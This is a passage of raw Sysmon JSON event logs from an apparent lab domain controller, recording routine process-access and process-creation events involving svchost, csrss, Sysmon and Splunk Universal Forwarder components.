C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2774,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2775,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020D-5F25-0000-001069E30400}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020D-5F25-0000-001069E30400}","TargetProcessId":"4548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2776,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.651\r\nSourceProcessGUID: {A837DB8D-020D-5F25-0000-001069E30400}\r\nSourceProcessId: 4548\r\nSourceThreadId: 4556\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.651","SourceProcessGUID":"{A837DB8D-020D-5F25-0000-001069E30400}","SourceProcessId":"4548","SourceThreadId":"4556","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2777,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nProcessGuid: {A837DB8D-020E-5F25-0000-001035E50400}\r\nProcessId: 4552\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","ProcessGuid":"{A837DB8D-020E-5F25-0000-001035E50400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2778,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-020E-5F25-0000-001035E50400}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-020E-5F25-0000-001035E50400}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2779,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020E-5F25-0000-001035E50400}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020E-5F25-0000-001035E50400}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2780,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2781,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2782,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 